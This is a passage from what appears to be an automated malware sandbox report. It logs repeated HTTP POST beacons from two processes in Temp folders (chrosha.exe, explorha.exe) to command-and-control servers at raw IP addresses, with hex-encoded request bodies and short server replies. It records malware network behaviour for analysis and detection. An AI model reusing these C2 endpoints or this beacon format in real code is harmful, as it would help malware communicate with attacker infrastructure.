                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:48.227771997 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      397192.168.2.550241193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:48.322894096 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:48.571576118 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      398192.168.2.550242193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:48.583036900 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:48.826942921 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      399192.168.2.550243193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:48.825057983 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:49.079473972 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      400192.168.2.550244193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:49.074312925 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:49.323549032 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      401192.168.2.550245193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:49.445554972 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:49.689218998 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      402192.168.2.550246193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:49.684624910 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:49.936429024 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      403192.168.2.550247193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:49.941083908 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:50.193219900 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      404192.168.2.550248193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:50.190536022 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:50.443768978 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      405192.168.2.550249193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:50.558159113 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:50.806752920 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      406192.168.2.550250193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:50.801692009 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.045459986 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      407192.168.2.550251193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.057951927 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.310666084 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      408192.168.2.550252193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.298861980 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.551752090 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      409192.168.2.550253193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.668190956 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.919972897 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      410192.168.2.550254193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:51.913796902 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:52.158246040 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      411192.168.2.550255193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:52.168215036 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:52.418425083 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      412192.168.2.550256193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:52.407548904 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:52.656743050 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


